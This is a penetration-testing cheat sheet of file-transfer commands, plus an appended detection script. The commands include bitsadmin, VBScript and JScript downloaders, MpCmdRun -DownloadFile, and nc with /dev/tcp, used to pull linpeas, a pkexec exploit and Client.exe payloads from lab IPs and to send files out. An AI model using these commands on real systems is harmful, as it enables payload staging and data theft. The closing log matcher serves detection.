File Transfer
Quick generator for file download commands
https://forum.ywhack.com/bountytips.php?download
Starting an HTTP server with Python
Sender (run in the directory that contains the file to transfer)
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
python2.7 -m SimpleHTTPServer 8080
Receiver:
wget http://192.168.56.102:8080/linpeas.sh
wget http://192.168.56.102:8080/pkexec-cve-2021-4034
nc
On the receiver:
nc -nlvp 9002 > /path/to/file
On the sender (/dev/tcp is a bash feature, so this must run in bash):
cat /path/to/file > /dev/tcp/192.168.56.102/9002
SCP
scp -P 22 file.txt user@1.1.1.1:/tmp
scp -r /path/to/source_folder username@destination_server:/path/to/destination_folder
rsync
rsync -avz /path/to/source_folder username@destination_server:/path/to/destination_folder
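In this command, the -avz options mean:
-a  preserves file attributes during the transfer, transfers directories recursively, and preserves links, permissions, and so on.
-v  gives verbose output, so you can see detailed information about the transfer as it runs.
-z  enables compression during the transfer, which saves bandwidth.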
perl
perl -MLWP::Simple -e 'die "下载失败" unless is_success(getstore("http://192.168.56.102/tools/linpeas.sh", "linpeas.sh"))'
bitsadmin
Does not support the https or ftp protocols; the servers built into PHP and Python cause errors.
> bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
> bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
> bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
> bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe"
FTP
> open 192.168.0.98 21
> (enter the username and password)
> dir (list the files)
> get file.txt
js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");
> cscript /nologo 1.js http://192.168.1.192/Client.exe
PHP
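#!/usr/bin/php
<?php
// Read the whole response as one binary-safe string; file() would split it into lines.
$data = @file_get_contents("http://192.168.1.192/Client.exe");
if ($data === false) {
    fwrite(STDERR, "download failed\n");
    exit(1);
}
$lf = "1.exe";
$fh = fopen($lf, 'wb');
fwrite($fh, $data);
fclose($fh);
?>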
Python
python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Python3
python3 -c "import urllib.request; urllib.request.urlretrieve('https://192.168.56.102/tools/linpeas.sh', 'linpeas.sh')"
vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2, 13056 ' ignore HTTPS errors (server certificate validation is turned off)
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe", adSaveCreateOverWrite
ado.Close
wget
wget http://192.168.1.192/Client.exe
wget -b  download in the background
wget -c  resume an interrupted download
Windows Defender
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c
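A defender's view of the download commands listed above, as an added example that is not part of the original page: a small Python matcher that flags these transfer patterns in process-creation command lines. The rule names, the classify and scan helpers, and the sample log lines are constructed for illustration.

```python
import re

# Each rule is (name, regex over one process command line). The patterns mirror
# the transfer commands listed on this page; the rule names are made up here.
RULES = [
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*?/transfer\b.*?https?://", re.I)),
    ("mpcmdrun_downloadfile", re.compile(r"\bmpcmdrun(\.exe)?\b.*?-downloadfile\b", re.I)),
    ("script_host_url_arg", re.compile(r"\b[cw]script(\.exe)?\b.*?https?://", re.I)),
    ("python_urlretrieve", re.compile(r"\bpython[\d.]*\b.*?\burlretrieve\b", re.I)),
    ("perl_lwp_getstore", re.compile(r"\bperl\b.*?\bgetstore\b", re.I)),
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
]
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)

def classify(cmdline):
    """Return (rule_name, url_or_None) for the first matching rule, else None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            url = URL_RE.search(cmdline)
            return name, url.group(0) if url else None
    return None

def scan(cmdlines):
    """Return [(line_index, rule_name, url)] for every flagged command line."""
    hits = []
    for i, line in enumerate(cmdlines):
        result = classify(line)
        if result:
            hits.append((i, result[0], result[1]))
    return hits

# Constructed sample: command lines as they would appear in process-creation
# logs (Windows Security event 4688, Sysmon event 1, or Linux auditd execve).
SAMPLE = [
    r'bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe',
    r'bitsadmin /list /allusers',                  # benign: no transfer job
    r'MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\users\test\desktop\1.c',
    r'MpCmdRun.exe -Scan -ScanType 1',             # benign: routine scan
    r'cscript /nologo 1.js http://192.168.1.192/Client.exe',
    r'bash -c "cat notes.txt > /dev/tcp/192.168.56.102/9002"',
]

if __name__ == "__main__":
    for idx, rule, url in scan(SAMPLE):
        print(f"line {idx}: {rule} url={url}")
```

The extracted URL gives the responder the remote host to pivot on in proxy or DNS logs; the two benign lines show that the tool name alone does not trigger a rule.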
Other uses
License:
CC BY 4.0